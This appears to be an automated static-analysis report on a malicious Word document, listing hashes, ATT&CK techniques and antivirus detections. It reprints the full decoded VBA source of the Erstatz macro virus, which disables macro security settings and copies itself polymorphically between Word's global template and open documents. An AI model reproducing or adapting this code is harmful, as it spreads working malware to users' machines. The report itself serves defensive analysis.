Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 da664cf22f7e21ce…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 28.5 KB
Created: 1999-06-04 19:15:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 5bb8bffa0a219f2e7f38de4dd67e4f59
SHA-1: 28ab4c9f5f8f633247402142727e42dde5e04c57
SHA-256: da664cf22f7e21ce2bc7f40b5e621e9b1c991d42a5be24c7e6e5714e7902128d
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, a common technique for executing code automatically when an Office document is opened. The script attempts to disable macro security warnings (it lowers the Word security level in the registry, disables the Security... menu item and turns off Options.VirusProtection) and copies its own code between the NormalTemplate and ActiveDocument VBA components, randomly inserting and deleting comment lines in each copy. This is the behaviour of a self-replicating, polymorphic macro virus that persists in the global template and infects other documents handled by the same Word installation. The ClamAV detections 'Doc.Trojan.Erstatz-1' and 'Win.Trojan.wmvg-1' further support the malicious classification of this file.

Heuristics (3)

  • ClamAV: Doc.Trojan.Erstatz-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Erstatz-1
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document contains a Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7029 bytes
SHA-256: 81241f92d979a3144aaf29bcf890bc7f5363aa76c7972c67da4680eb1c6802d7
Detection: ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()
'
'Erstatz v1.0
On Error Resume Next
GoTo setup
infekt:
Set nrmal = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set aktiv = ActiveDocument.VBProject.VBComponents(1).CodeModule
If nrmal.lines(2, 1) <> "'" Then
nrmal.deletelines 1, nrmal.countoflines
nrmal.insertlines 2, aktiv.lines(2, aktiv.countoflines)
nrmal.insertlines 1, "Sub Document_Close()"
'
For n = 9 To nrmal.countoflines
Randomize
'
'
'
ma = Int((Rnd * 4) + 1)
'
If nrmal.lines(n, 1) = "'" And ma >= 2 Then
nrmal.deletelines n, 1
'
je = je + 1
If je = 15 Then GoTo ausgang
'
End If
Next n
End If
'
ausgang:
'
'
If aktiv.lines(2, 1) <> "'" Then
'
'
aktiv.deletelines 1, aktiv.countoflines
aktiv.insertlines 2, nrmal.lines(2, nrmal.countoflines)
aktiv.insertlines 1, "Sub Document_Open()"
For i = 9 To aktiv.countoflines
Randomize
ma = Int((Rnd * 4) + 1)
If ma <= 2 Then
aktiv.insertlines i, "'"
End If
Next i
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, fileformat:=wdFormatDocument
End If
GoTo done
setup:
Options.SaveNormalPrompt = False
Options.SendMailAttach = True
Options.ConfirmConversions = False
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.VirusProtection = False
End If
GoTo infekt:
done:
End Sub